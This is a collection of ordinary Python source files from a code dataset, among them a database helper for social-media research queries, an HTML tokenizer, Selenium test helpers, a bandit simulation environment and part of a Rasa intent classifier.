posts):\n table_name = 'posts'\n keys = ['post_id', 'domain']\n self.add_entity_fast(table_name, posts)\n\n def add_terms_fast(self, terms):\n table_name = 'terms'\n keys = ['term_id']\n self.add_entity_fast(table_name, terms)\n\n # bulk-insert counterpart of add_claim_keywords_connections (given its own name so it\n # does not shadow the session-merge method of the same name defined above)\n def add_claim_keywords_connections_fast(self, claim_keywords):\n self.add_entity_fast('claim_keywords', claim_keywords)\n\n def add_topic_items_fast(self, topic_items):\n table_name = 'topics'\n keys = ['topic_id', 'term_id']\n self.add_entity_fast(table_name, topic_items)\n\n def add_post_topic_mappings_fast(self, post_topic_mappings):\n table_name = 'post_topic_mapping'\n keys = ['post_id']\n self.add_entity_fast(table_name, post_topic_mappings)\n\n def add_news_articles_fast(self, news_articles):\n table_name = 'news_articles'\n keys = ['article_id']\n 
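# note: the `keys` lists assigned in these add_*_fast helpers are never passed on;\n # add_entity_fast relies on bulk_save_objects, so the key lists look like leftovers\n # from an earlier upsert-by-key design.\n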
self.add_entity_fast(table_name, news_articles)\n\n def add_author_connections_fast(self, author_connections):\n keys = ['source_author_guid', 'destination_author_guid', 'connection_type']\n table_name = 'author_connections'\n self.add_entity_fast(table_name, author_connections)\n\n def add_author_features_fast(self, author_features):\n keys = ['author_guid', 'window_start', 'window_end', 'attribute_name']\n table_name = 'author_features'\n # note: unlike its sibling helpers, this one delegates to insert_or_update\n self.insert_or_update(author_features)\n\n def add_reddit_authors(self, authors):\n keys = ['name', 'author_guid']\n table_name = 'reddit_authors'\n self.add_entity_fast(table_name, authors)\n\n def add_claims_fast(self, claims):\n keys = ['claim_id']\n table_name = 'claims'\n self.add_entity_fast(table_name, claims)\n\n def add_authors_fast(self, authors):\n keys = ['author_guid', 'name', 'domain']\n table_name = 'authors'\n self.add_entity_fast(table_name, authors)\n\n def get_entity_key(self, table_item):\n return self.inspect_item(table_item).identity\n\n def inspect_item(self, table_item):\n return inspect(table_item)\n\n def map_item(self, item, table_mapper):\n return mapper(item, table_mapper)\n\n def add_entity_fast(self, table_name, entities):\n try:\n self.session.bulk_save_objects(entities)\n self.session.commit()\n print('Add {} new {} to db'.format(len(entities), table_name))\n return\n except Exception as e:\n count = len(entities)\n self.session.rollback()\n if count <= 10000:\n self.merge_items(entities)\n self.session.commit()\n else:\n # integer division: list slices require int indices in Python 3\n self.add_entity_fast(table_name, entities[:count // 2])\n self.add_entity_fast(table_name, entities[count // 2:])\n\n # def add_authors_fast(self, authors):\n #     self.add_items_fast(self.get_author_dictionary(), authors, 'author_guid', 'authors')\n\n # def add_author_features_fast(self, author_features):\n #     author_feature_dict = {author_feature.author_guid: author_feature for author_feature in self.get_author_features()}\n #     self.add_items_fast(author_feature_dict, author_features, 'author_guid', 'author_features')\n\n def add_items_fast(self, item_dict, items, item_key, item_type='items'):\n self.session.close()\n filtered_items = []\n for item in items:\n if getattr(item, item_key) not in item_dict:\n filtered_items.append(item)\n item_dict[getattr(item, item_key)] = item\n duplication_count = str(len(items) - len(filtered_items))\n print('Add {} new {} to db, remove {} duplications'.format(len(filtered_items), item_type, duplication_count))\n self.session.bulk_save_objects(filtered_items)\n self.session.commit()\n\n def get_claims_tuples(self):\n q = \"\"\"\n SELECT *\n FROM claims\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def get_posts_from_domain_contain_words(self, domain, words):\n conditions = [Post.content.like('%{}%'.format(word)) for word in words]\n return self.session.query(Post).filter(and_(Post.domain == domain, and_(*conditions))).all()\n\n def insert_or_update(self, items):\n try:\n self.session.bulk_save_objects(items, update_changed_only=False)\n self.session.commit()\n except Exception as e:\n self.session.rollback()\n self.addPosts(items)\n\n def delete_class_author_features(self, class_name):\n self.session.query(AuthorFeatures).filter(AuthorFeatures.attribute_name.startswith(class_name)).delete(\n synchronize_session=False)\n self.session.commit()\n\n def drop_table(self, table_name):\n if self.is_table_exist(table_name):\n table = self.get_table_by_name(table_name)\n table.__table__.drop(self.engine)\n\n def get_authors_with_feature(self, feature_prefix_name, author_guids=None):\n if not author_guids:\n result = self.session.query(AuthorFeatures.author_guid).distinct(AuthorFeatures.author_guid) \\\n .filter(AuthorFeatures.attribute_name.startswith(feature_prefix_name)).all()\n else:\n result = self.session.query(AuthorFeatures.author_guid).distinct(AuthorFeatures.author_guid) \\\n .filter(and_(AuthorFeatures.attribute_name.startswith(feature_prefix_name),\n AuthorFeatures.author_guid.in_(set(author_guids)))).all()\n return [r[0] for r in result]\n\n def get_authors_with_enough_features(self, feature_prefix_name, count):\n result = self.session.query(AuthorFeatures.author_guid, func.count(AuthorFeatures.attribute_name)) \\\n .filter(AuthorFeatures.attribute_name.startswith(feature_prefix_name)) \\\n .group_by(AuthorFeatures.author_guid).having(func.count(AuthorFeatures.attribute_name) == count).all()\n return [r[0] for r in result]\n\n def get_authors_with_features(self, feature_names, author_guids=None):\n # intersect the per-feature author sets (this list was commented out, leaving author_sets undefined)\n author_sets = [set(self.get_authors_with_feature(feature_name, author_guids)) for feature_name in feature_names]\n return set.intersection(*author_sets)\n\n def get_hospital_twitter_screen_names(self):\n q = \"\"\"\n SELECT hospital_tweet_users_with_screen_names.screen_name\n FROM hospital_tweet_users_with_screen_names\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n\n def get_labor_employees_screen_names(self):\n q = \"\"\"\n SELECT labor_unions_tweet_users_with_screen_names.screen_name\n FROM labor_unions_tweet_users_with_screen_names\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n\n def get_follower_ids_of_hospitals_and_labor_unions(self):\n q = \"\"\"\n SELECT union_healthcare_and_labor_union_workers.destination_author_osn_id\n FROM union_healthcare_and_labor_union_workers\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = self.result_iter(cursor)\n return [id[0] for id in ids]\n\n\n def get_intersection_of_labor_union_and_healthcare_users_followers_ids(self):\n q = \"\"\"\n SELECT DISTINCT(temp_author_connections.destination_author_osn_id)\n FROM temp_author_connections\n WHERE temp_author_connections.destination_author_osn_id IN (\n SELECT healtchcare_temp_author_connections.destination_author_osn_id\n FROM healtchcare_temp_author_connections\n )\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = self.result_iter(cursor)\n return [id[0] for id in ids]\n\n\n #\n # collect all users whose follower ids have already been retrieved\n def get_already_retrieved_their_follower_ids(self):\n q = \"\"\"\n SELECT DISTINCT(temp_author_connections.source_author_osn_id)\n FROM temp_author_connections\n WHERE temp_author_connections.connection_type = 'follower'\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n\n\n # SELECT DISTINCT(temp_author_connections.destination_author_osn_id)\n # FROM 
temp_author_connections\n # WHERE temp_author_connections.source_author_osn_id NOT IN (\n # SELECT labor_unions_users_with_screen_names_osn_ids_and_relevance.author_osn_id\n # FROM labor_unions_users_with_screen_names_osn_ids_and_relevance\n # WHERE labor_unions_users_with_screen_names_osn_ids_and_relevance.is_related_to_healthcare_using_Wikipedia = '0'\n # )\n # AND temp_author_connections.destination_author_osn_id NOT IN (\n # SELECT labor_unions_users_with_screen_names_osn_ids_and_relevance.author_osn_id\n # FROM labor_unions_users_with_screen_names_osn_ids_and_relevance\n # )\n\n def get_healthcare_labor_union_follower_ids(self):\n q = \"\"\"\n SELECT DISTINCT(temp_author_connections.destination_author_osn_id)\n FROM temp_author_connections\n WHERE temp_author_connections.destination_author_osn_id NOT IN (\n SELECT labor_unions_users_with_screen_names_osn_ids_and_relevance.author_osn_id\n FROM labor_unions_users_with_screen_names_osn_ids_and_relevance\n )\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n osn_ids = self.result_iter(cursor)\n return [r[0] for r in osn_ids]\n\n\n def get_poi_screen_names(self):\n q = \"\"\"\n SELECT Optional_POIs_with_twitter_screen_name.twitter_author_screen_name\n FROM Optional_POIs_with_twitter_screen_name\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n\n def get_poi_v6_screen_names(self):\n q = \"\"\"\n SELECT Health_POIs_V6_with_screen_names.author_screen_name\n FROM Health_POIs_V6_with_screen_names\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n\n def get_follower_ids_to_crawl(self):\n q = \"\"\"\n SELECT DISTINCT(temp_author_connections.destination_author_osn_id)\n FROM temp_author_connections\n WHERE temp_author_connections.destination_author_osn_id NOT IN (\n SELECT authors.author_osn_id\n FROM authors\n )\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n author_ids = self.result_iter(cursor)\n return [r[0] for r in author_ids]\n\n def get_author_ids_not_general_public_and_not_brought_followers_for_them(self):\n q = \"\"\"\n SELECT Health_POIs_V6_with_screen_names_and_osn_ids.author_osn_id\n FROM Health_POIs_V6_with_screen_names_and_osn_ids\n WHERE Health_POIs_V6_with_screen_names_and_osn_ids.general_public_interest = ''\n AND Health_POIs_V6_with_screen_names_and_osn_ids.author_osn_id NOT IN (\n SELECT DISTINCT(temp_author_connections.source_author_osn_id)\n FROM temp_author_connections\n )\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n author_ids = self.result_iter(cursor)\n return [r[0] for r in author_ids]\n\n def get_description_and_full_names_for_authors(self):\n q = \"\"\"\n SELECT authors.author_guid, authors.author_osn_id, authors.author_screen_name, authors.author_full_name, authors.description\n FROM authors\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n records = self.result_iter(cursor)\n return records\n\n\n def get_healthcare_worker_screen_names(self):\n q = \"\"\"\n SELECT authors.author_screen_name\n FROM authors\n WHERE authors.author_type = 'Healthcare_Worker_Auto'\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return 
[r[0] for r in screen_names]\n\n def get_spokesmanships_screen_names(self):\n q = \"\"\"\n SELECT spokesmanships.Twitter_Screen_Name\n FROM spokesmanships\n WHERE spokesmanships.Twitter_Screen_Name IS NOT NULL\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n author_screen_names = self.result_iter(cursor)\n return [r[0] for r in author_screen_names]\n\n return set.intersection(*author_sets)\n\n def get_authors_by_popularity(self):\n query = \"\"\"\n SELECT posts.author_guid, count(posts.post_id)\n FROM posts\n GROUP BY 1\n ORDER BY 2 Desc\n \"\"\"\n # posts = self.session.query(Post).filter(Post.domain == unicode(domain)).slice(start,stop).all()\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n author_popularity_tupls = self.result_iter(cursor) # , a\n return author_popularity_tupls","sub_path":"DB/schema_definition.py","file_name":"schema_definition.py","file_ext":"py","file_size_in_byte":217021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"15324797","text":"#!/usr/bin/env python\nimport os\nimport BaseHTMLTokenizer as bht\nfrom BaseHTMLTokenizer import BaseHTMLTokenizer\n\n\nPYTHON_TEXT_EXTRACT_SCRIPT = os.path.join(os.path.dirname(bht.__file__),\"extractText.py\")\nPERL_TOKENIZE_SCRIPT = os.path.join(os.path.dirname(bht.__file__),\"tokenize.pl\")\n\n\n\t\nclass HTMLTokenizer(BaseHTMLTokenizer):\n\tdef __init__(self,db_path,**kwargs):\n\t\t'''\n\t\tUse of subprocess for multi-threaded processing needs to be fixed\n\t\t'''\n\t\tdef textExtractor(html_string):\t\t\t\n\t\t\timport subprocess\n\t\t\tp = subprocess.Popen([\"python\",PYTHON_TEXT_EXTRACT_SCRIPT],stdout=subprocess.PIPE,stdin=subprocess.PIPE)\n\t\t\tout,err = p.communicate(html_string)\n\t\t\tif err:\n\t\t\t\traise Exception(err)\n\t\t\treturn out\n\t\t\t#import extracttext as et\t\t\t\t\t\t\n\t\t\t#return et.extractText(html_string).encode(\"utf-8\")\n\t\t\t\t\n\t\tdef tokenExtractor(page_text):\n\t\t\timport subprocess\n\t\t\tp = subprocess.Popen([\"perl\",PERL_TOKENIZE_SCRIPT],stdout=subprocess.PIPE,stdin=subprocess.PIPE)\n\t\t\tout,err = p.communicate(page_text)\n\t\t\tif err:\n\t\t\t\traise Exception(err)\n\t\t\treturn out\n\t\t\n\t\tsuper(self.__class__,self).__init__(db_path,textExtractor,tokenExtractor,**kwargs)\n\t\t\t\nif __name__ == \"__main__\":\t\n\tpass","sub_path":"tokenize/HTMLTokenizer.py","file_name":"HTMLTokenizer.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519342107","text":"from setuptools import setup, find_packages\n\nname = \"gocept.cvs\"\nsetup(\n name = name,\n version = \"0.1.10\",\n author = \"Daniel Havlik\",\n author_email = \"dh@gocept.com\",\n description = \"zc.buildout recipe for checking out cvs modules.\",\n long_description = open('README.txt').read() + \n '\\n\\n' + \n open('CHANGES.txt').read(),\n license = \"ZPL 2.1\",\n keywords = \"buildout cvs recipe\",\n classifiers = [\"Framework :: Buildout\"],\n url='http://svn.gocept.com/repos/gocept/'+name,\n download_url='https://svn.gocept.com/repos/gocept/gocept.cvs/trunk#egg=gocept.cvs-dev',\n zip_safe=False,\n packages = find_packages('src'),\n include_package_data = True,\n package_dir = {'':'src'},\n namespace_packages = ['gocept'],\n install_requires = ['zc.buildout', 'setuptools'],\n entry_points = {\n 'zc.buildout': [\n 'default = %s:Recipe' % name],\n 'zc.buildout.uninstall': [\n 'default = 
%s:uninstall' % name],\n },\n test_suite = 'gocept.cvs.tests.test_recipe.test_suite',\n tests_require = ['zc.buildout',\n 'zope.testing',\n 'setuptools',\n 'py == 0.9.0',],\n )\n","sub_path":"pypi_install_script/gocept.cvs-0.1.10.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262727629","text":"# jacob clarkson\n# project euler problem 2\n# january 2015\n\n# variables to store previously calculated fibonacci numbers\nx = 1\ny = 2\nz = 0\n\n# variable to store the sum\nsum = 0\n\n# main loop\nwhile 1:\n\tz = x + y # calculate next term\n\tif z >= 4000000: # break out of while loop\n\t\tbreak\n\tif z % 2 == 0: # check for even and add to sum\n\t\tsum += z\n\tx = y # swap stored values\n\ty = z\n\nprint(sum + 2)\n","sub_path":"Prob02.py","file_name":"Prob02.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"436338381","text":"from abc import ABCMeta\n\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.remote.webdriver import WebDriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nWAIT_TIMEOUT = 20\n\n\nclass PageObject(metaclass=ABCMeta):\n\n def __init__(self, driver):\n self.driver: WebDriver = driver\n\n def is_element_located_present(self, how, what):\n try:\n return bool(self.driver.find_element(how, what))\n except NoSuchElementException:\n return False\n\n def is_element_located_displayed(self, how, what):\n try:\n return self.driver.find_element(how, what).is_displayed()\n except NoSuchElementException:\n return False\n\n def wait_for_presence_of_element_located(self, how, what, timeout=0):\n timeout = timeout or WAIT_TIMEOUT\n wait = WebDriverWait(self.driver, timeout)\n try:\n wait.until(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return False\n\n def wait_for_visibility_of_element_located(self, how, what, timeout=0):\n timeout = timeout or WAIT_TIMEOUT\n wait = WebDriverWait(self.driver, timeout)\n try:\n wait.until(EC.visibility_of_element_located((how, what)))\n except TimeoutException:\n return False\n\n def wait_for_ajax(self, timeout=0):\n timeout = timeout or WAIT_TIMEOUT\n wait = WebDriverWait(self.driver, timeout)\n try:\n wait.until(lambda dr: dr.execute_script(\"return jQuery.active == 0\"))\n except TimeoutException:\n return False\n\n def wait_for_javascript(self, timeout=0):\n timeout = timeout or WAIT_TIMEOUT\n wait = WebDriverWait(self.driver, timeout)\n try:\n wait.until(lambda dr: dr.execute_script('return document.readyState === \"complete\"'))\n except TimeoutException:\n return False\n","sub_path":"page_objects/abstract/page_object.py","file_name":"page_object.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"187456556","text":"from whoosh.index import create_in\nfrom whoosh.fields import *\n\nschema = Schema(title=TEXT(stored=True),path=ID(stored=True),content=TEXT(stored=True))\nix = create_in('indexer',schema)\nwriter = ix.writer()\nwriter.add_document(title=u'xio小',path=u'/a',content = u'this is the first')\nwriter.add_document(title=u'xio小',path=u'/b',content = u'this is the first xio小 we\"ve 
add!')\nwriter.commit(merge=False)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273303458","text":"import numpy as np\n\nfrom audio_process import get_input_and_length\nfrom text_process import get_label_and_length\n\n\n# train数据生成器\ndef train_generator(data, batchs, batch_size, audio_feature_type, max_input_length, max_label_length):\n audio_data_path_list, text_int_sequences_list = data\n\n # generator只能进行一次生成,故需要while True来进行多个epoch的数据生成\n while True:\n # 每epoch将所有数据进行一次shuffle\n order = np.random.choice(len(audio_data_path_list), len(audio_data_path_list), replace=False)\n audio_data_path_list = [audio_data_path_list[i] for i in order]\n text_int_sequences_list = [text_int_sequences_list[i] for i in order]\n\n for idx in range(batchs):\n batch_input_tensor, batch_input_length = get_input_and_length(\n audio_data_path_list[idx * batch_size: (idx + 1) * batch_size],\n audio_feature_type,\n max_input_length\n )\n batch_label_tensor, batch_label_length = get_label_and_length(\n text_int_sequences_list[idx * batch_size: (idx + 1) * batch_size],\n max_label_length\n )\n\n yield batch_input_tensor, batch_label_tensor, batch_input_length, batch_label_length\n\n\n# 测试数据生成器\ndef test_generator(data, batchs, batch_size, audio_feature_type, max_input_length):\n audio_data_path_list, text_list = data\n\n while True:\n for idx in range(batchs):\n batch_input_tensor, batch_input_length = get_input_and_length(\n audio_data_path_list[idx * batch_size: (idx + 1) * batch_size],\n audio_feature_type,\n max_input_length\n )\n batch_text_list = text_list[idx * batch_size: (idx + 1) * batch_size]\n\n # 测试集只需要文本串list\n yield batch_input_tensor, batch_input_length, batch_text_list\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"hlp/stt/utils/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"235803617","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport math\n\n\n# find_element_by_css_selector('input[type=\"checkbox\"]')\ndef calc(x):\n return str(math.log(abs(12 * math.sin(int(x)))))\n\n\nlink = \"http://suninjuly.github.io/get_attribute.html\"\n\nwith webdriver.Chrome() as browser:\n try:\n browser.get(link)\n chest = browser.find_element_by_id(\"treasure\")\n valuex = chest.get_attribute(\"valuex\")\n print(valuex)\n x = calc(valuex)\n print(x)\n text_field = browser.find_element_by_id(\"answer\")\n text_field.send_keys(x)\n checkbox = browser.find_element_by_id(\"robotCheckbox\")\n checkbox.click()\n radiobutton = browser.find_element_by_id(\"robotsRule\")\n radiobutton.click()\n submit_button = browser.find_element_by_css_selector(\"body > div > form > div > div > button\")\n submit_button.click()\n\n finally:\n time.sleep(5)\n browser.quit()\n","sub_path":"Module_2/Lesson 2.1.5.py","file_name":"Lesson 2.1.5.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"354401495","text":"from porise import Env \nfrom porise.envs.utils import seeding\nfrom porise.envs.utils.discrete import Discrete\n\nimport numpy as np \nimport itertools\n\n\nclass LinearEnv(Env):\n def __init__(self, n_arm, feature_dim, max_steps=1e5, noise_std=1.0):\n self.action_space = Discrete(n_arm)\n 
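# max_steps defaults to 1e5 (a float) but is used below in range() and\n # np.random.randn(); coercing it to int here (assumed intent) avoids a\n # TypeError in reset_features()/reset_rewards():\n max_steps = int(max_steps)\n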
self.n_arm = n_arm\n self.feature_dim = feature_dim\n self.max_steps = max_steps\n self.h = self.get_reward_func()\n # standard deviation of Gaussian reward noise\n self.noise_std = noise_std\n\n self.seed()\n # initialize arm features, rewards, and others.\n self.reset()\n \n def get_reward_func(self):\n a = np.random.randn(self.feature_dim)\n a /= np.linalg.norm(a, ord=2)\n return lambda x: 100*np.dot(a, x)\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n \n def step(self, action):\n err_msg = \"%r (%s) invalid\" % (action, type(action))\n assert self.action_space.contains(action), err_msg\n\n reward = self.rewards[self.steps_beyond_done, action]\n best_action = self.best_actions_oracle[self.steps_beyond_done]\n regret = self.best_rewards_oracle[self.steps_beyond_done] - reward\n assert self.action_space.contains(best_action)\n assert regret >= 0\n self.info = {\n 'best_arm_hit': best_action == action,\n 'regret': regret\n }\n \n if self.steps_beyond_done == self.max_steps-1:\n self.done = True \n self.steps_beyond_done = 0\n else:\n self.steps_beyond_done += 1\n self.state = self.features[self.steps_beyond_done]\n\n return self.state, reward, self.done, self.info\n\n def reset(self):\n self.state = None\n self.steps_beyond_done = 0\n self.done = False \n self.info = {}\n self.best_arm_hit = 0\n\n self.reset_features()\n self.reset_rewards(self.h)\n \n def reset_features(self):\n \"\"\"Generate normalized random N(0,1) features.\n \"\"\"\n x = np.random.randn(self.max_steps, self.n_arm, self.feature_dim)\n x /= np.repeat(np.linalg.norm(x, axis=-1, ord=2), self.feature_dim).reshape(self.max_steps, self.n_arm, self.feature_dim)\n self.features = x\n\n def reset_rewards(self, h):\n \"\"\"Generate rewards for each arm and each round,\n following the reward function h + Gaussian noise.\n \"\"\"\n self.rewards = np.array(\n [\n h(self.features[t, k]) + self.noise_std*np.random.randn()\\\n for t,k in itertools.product(range(self.max_steps), range(self.n_arm))\n ]\n ).reshape(self.max_steps, self.n_arm)\n\n # to be used only to compute regret, NOT by the algorithm itself\n self.best_rewards_oracle = np.max(self.rewards, axis=1)\n self.best_actions_oracle = np.argmax(self.rewards, axis=1)","sub_path":"porise/envs/synthetic/contextual_base.py","file_name":"contextual_base.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343229465","text":"import copy\nimport logging\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport numpy as np\nimport os\nimport scipy.sparse\nimport tensorflow as tf\n\nfrom typing import Any, Dict, List, Optional, Text, Tuple, Union, Type\n\nimport rasa.shared.utils.io\nimport rasa.utils.io as io_utils\nimport rasa.nlu.utils.bilou_utils as bilou_utils\nfrom rasa.shared.constants import DIAGNOSTIC_DATA\nfrom rasa.nlu.featurizers.featurizer import Featurizer\nfrom rasa.nlu.components import Component\nfrom rasa.nlu.classifiers.classifier import IntentClassifier\nfrom rasa.nlu.extractors.extractor import EntityExtractor, EntityTagSpec\nfrom rasa.nlu.classifiers import LABEL_RANKING_LENGTH\nfrom rasa.utils import train_utils\nfrom rasa.utils.tensorflow import layers\nfrom rasa.utils.tensorflow.models import RasaModel, TransformerRasaModel\nfrom rasa.utils.tensorflow.model_data import (\n RasaModelData,\n FeatureSignature,\n FeatureArray,\n)\nfrom rasa.nlu.constants import TOKENS_NAMES\nfrom rasa.shared.nlu.constants 
import (\n TEXT,\n INTENT,\n INTENT_RESPONSE_KEY,\n ENTITIES,\n ENTITY_ATTRIBUTE_TYPE,\n ENTITY_ATTRIBUTE_GROUP,\n ENTITY_ATTRIBUTE_ROLE,\n NO_ENTITY_TAG,\n SPLIT_ENTITIES_BY_COMMA,\n)\nfrom rasa.nlu.config import RasaNLUModelConfig\nfrom rasa.shared.exceptions import InvalidConfigException\nfrom rasa.shared.nlu.training_data.training_data import TrainingData\nfrom rasa.shared.nlu.training_data.message import Message\nfrom rasa.nlu.model import Metadata\nfrom rasa.utils.tensorflow.constants import (\n LABEL,\n IDS,\n HIDDEN_LAYERS_SIZES,\n SHARE_HIDDEN_LAYERS,\n TRANSFORMER_SIZE,\n NUM_TRANSFORMER_LAYERS,\n NUM_HEADS,\n BATCH_SIZES,\n BATCH_STRATEGY,\n EPOCHS,\n RANDOM_SEED,\n LEARNING_RATE,\n RANKING_LENGTH,\n LOSS_TYPE,\n SIMILARITY_TYPE,\n NUM_NEG,\n SPARSE_INPUT_DROPOUT,\n DENSE_INPUT_DROPOUT,\n MASKED_LM,\n ENTITY_RECOGNITION,\n TENSORBOARD_LOG_DIR,\n INTENT_CLASSIFICATION,\n EVAL_NUM_EXAMPLES,\n EVAL_NUM_EPOCHS,\n UNIDIRECTIONAL_ENCODER,\n DROP_RATE,\n DROP_RATE_ATTENTION,\n WEIGHT_SPARSITY,\n NEGATIVE_MARGIN_SCALE,\n REGULARIZATION_CONSTANT,\n SCALE_LOSS,\n USE_MAX_NEG_SIM,\n MAX_NEG_SIM,\n MAX_POS_SIM,\n EMBEDDING_DIMENSION,\n BILOU_FLAG,\n KEY_RELATIVE_ATTENTION,\n VALUE_RELATIVE_ATTENTION,\n MAX_RELATIVE_POSITION,\n AUTO,\n BALANCED,\n CROSS_ENTROPY,\n TENSORBOARD_LOG_LEVEL,\n CONCAT_DIMENSION,\n FEATURIZERS,\n CHECKPOINT_MODEL,\n SEQUENCE,\n SENTENCE,\n SEQUENCE_LENGTH,\n DENSE_DIMENSION,\n MASK,\n CONSTRAIN_SIMILARITIES,\n MODEL_CONFIDENCE,\n SOFTMAX,\n)\nfrom rasa.utils.tensorflow.data_generator import RasaBatchDataGenerator\n\nlogger = logging.getLogger(__name__)\n\n\nSPARSE = \"sparse\"\nDENSE = \"dense\"\nLABEL_KEY = LABEL\nLABEL_SUB_KEY = IDS\n\nPOSSIBLE_TAGS = [ENTITY_ATTRIBUTE_TYPE, ENTITY_ATTRIBUTE_ROLE, ENTITY_ATTRIBUTE_GROUP]\n\n\n\n\n\nclass JoinBert():\n\n def train(self,\n training_data: TrainingData,\n config: Optional[RasaNLUModelConfig] = None,\n **kwargs: Any,\n ):\n \"\"\"Train the embedding intent classifier on a data set.\"\"\"\n model_data = self.preprocess_train_data(training_data)\n if model_data.is_empty():\n logger.debug(\n f\"Cannot train '{self.__class__.__name__}'. No data was provided. 
\"\n f\"Skipping training of the joinbert classifier.\"\n )\n return\n\n \n def preprocess_train_data(self, training_data):\n if self.component_config[BILOU_FLAG]:\n '''user bilou: I-U-L entities for handle group entities\n '''\n bilou_utils.apply_bilou_schema(training_data)\n\n \n # intent dataset\n label_id_index_mapping = self._label_id_index_mapping(\n training_data,\n attribute=INTENT\n )\n\n if not label_id_index_mapping:\n # no labels are present to train\n return []\n \n self.index_label_id_mapping = self._invert_mapping(label_id_index_mapping)\n\n self._label_data = self._create_label_data(\n training_data, label_id_index_mapping, attribute=INTENT\n )\n\n @staticmethod\n def _label_id_index_mapping(\n training_data: TrainingData, attribute: Text\n ) -> Dict[Text, int]:\n \"\"\"Create label_id dictionary.\"\"\"\n\n distinct_label_ids = {\n example.get(attribute) for example in training_data.intent_examples\n } - {None}\n return {\n label_id: idx for idx, label_id in enumerate(sorted(distinct_label_ids))\n }\n\n @staticmethod\n def _invert_mapping(mapping: Dict) -> Dict:\n return {value: key for key, value in mapping.items()}\n\n def _create_label_data(\n self,\n training_data: TrainingData,\n label_id_dict: Dict[Text, int],\n attribute: Text,\n ) -> RasaModelData:\n \"\"\"Create matrix with label_ids encoded in rows as bag of words.\n\n Find a training example for each label and get the encoded features\n from the corresponding Message object.\n If the features are already computed, fetch them from the message object\n else compute a one hot encoding for the label as the feature vector.\n \"\"\"\n # Collect one example for each label\n labels_idx_examples = []\n for label_name, idx in label_id_dict.items():\n label_example = self._find_example_for_label(\n label_name, training_data.intent_examples, attribute\n )\n labels_idx_examples.append((idx, label_example))\n\n # Sort the list of tuples based on label_idx\n labels_idx_examples = sorted(labels_idx_examples, key=lambda x: x[0])\n labels_example = [example for (_, example) in labels_idx_examples]\n\n # Collect features, precomputed if they exist, else compute on the fly\n if self._check_labels_features_exist(labels_example, attribute):\n (\n sequence_features,\n sentence_features,\n ) = self._extract_labels_precomputed_features(labels_example, attribute)\n else:\n sequence_features = None\n sentence_features = self._compute_default_label_features(labels_example)\n\n label_data = RasaModelData()\n label_data.add_features(LABEL, SEQUENCE, sequence_features)\n label_data.add_features(LABEL, SENTENCE, sentence_features)\n\n if label_data.does_feature_not_exist(\n LABEL, SENTENCE\n ) and label_data.does_feature_not_exist(LABEL, SEQUENCE):\n raise ValueError(\n \"No label features are present. 
